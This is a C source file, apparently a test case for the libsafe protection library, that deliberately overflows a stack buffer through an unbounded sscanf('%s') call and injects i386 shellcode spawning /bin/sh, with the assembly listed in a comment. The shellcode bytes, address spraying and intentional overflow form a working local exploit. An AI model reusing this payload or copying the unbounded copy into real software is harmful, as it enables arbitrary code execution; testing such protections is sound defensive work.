1 /*
2 * $Name: release2_0-16 $
3 * $Id: t6.c,v 1.2 2002/06/12 20:30:37 ttsai Exp $
4 */
5
6
7 #include <stdio.h>
8 #include <string.h>
9
10 /*
11 jmp 1f
12 0:pop %esi
13 mov %esi,0x8(%esi)
14 xor %eax,%eax
15 mov %al,0x7(%esi)
16 mov %esi,%edi
17 add $4,%edi
18 mov %eax,0x8(%edi)
19 add $7,%eax
20 add $4,%eax
21 mov %esi,%ebx
22 lea 0x8(%esi),%ecx
23 lea 0x8(%edi),%edx
24 int $0x80
25 xor %ebx,%ebx
26 mov %ebx,%eax
27 inc %eax
28 int $0x80
29 1:call 0b");
30 */
/*
 * Test payload for this libsafe case: per the listing in the comment above,
 * these are the encoded i386 instructions followed by the "/bin/sh" string
 * they reference. foo() copies these bytes into large_string and feeds them
 * to sscanf(); the byte string is kept verbatim because the test depends on it.
 */
char shellcode[] =
"\xeb\x28\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\xf7\x83\xc7\x04"
"\x89\x47\x08\x83\xc0\x07\x83\xc0\x04\x89\xf3\x8d\x4e\x08\x8d\x57"
"\x08\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd3\xff\xff\xff/bin/sh";

/* Staging area for the overlong input that foo() hands to sscanf(). */
char large_string[128];
37
/*
 * Deliberately overflows a fixed-size stack buffer through sscanf("%s").
 *
 * This is a libsafe test fixture, not production code: the overflow is the
 * point, and the test expects the protective wrapper to stop it. The banner
 * text printed below states the pass/fail criterion the test relies on.
 *
 * Layout assumptions (confirm on the target): the code is written for a
 * 32-bit ABI where sizeof(long) == 4, so 32 longs exactly fill the 128-byte
 * large_string, and a pointer fits in an int. On an LP64 build the first
 * loop writes 256 bytes into a 128-byte array and the (int) cast truncates
 * the pointer, so the test would misbehave before reaching sscanf().
 */
void foo()
{
    char buffer[96];          /* the undersized destination */
    int i;
    /* large_string viewed as an array of longs so the first loop can store
     * pointer-sized values into it (type punning through a cast; a
     * strict-aliasing concern in its own right). */
    long *long_ptr = (long *) large_string;


    printf("This program tries to use scanf() to overflow the buffer.\n");
    printf("If you get a /bin/sh prompt, then the exploit has worked.\n");
    printf("Press any key to continue...");
    getchar();

    /* Fill large_string with repeated copies of buffer's address. */
    for (i = 0; i < 32; i++)
        *(long_ptr + i) = (int) buffer;
    /* Overwrite the start of large_string with the payload bytes. strlen()
     * stops at the payload's terminating NUL, so that NUL is not copied and
     * large_string keeps no early terminator. */
    for (i = 0; i < (int) strlen(shellcode); i++)
        large_string[i] = shellcode[i];

    /* The overflow: "%s" carries no field width, so sscanf() copies until
     * the first whitespace or NUL in its input, and large_string (128 bytes,
     * filled above so that it is meant to contain neither) overruns the
     * 96-byte buffer. A width such as "%95s" would bound the write; it is
     * omitted on purpose because this test exists to trigger the unbounded
     * copy that the wrapper under test is expected to intercept. */
    sscanf(large_string, "%s", buffer);

    return;
}
59
/*
 * Entry point: runs the overflow test case and reports if control comes
 * back. The two printf() lines are only reached when foo() returns
 * normally, i.e. when the overflow did not take over the program.
 */
int main(int ac, char *av[])
{
    /* Arguments are accepted for a conventional signature but unused. */
    (void) ac;
    (void) av;

    foo();

    /* Reached only on a normal return from foo(). */
    printf("If you see this statement, it means that the buffer\n");
    printf("overflow never occurred.\n");

    return 0;
}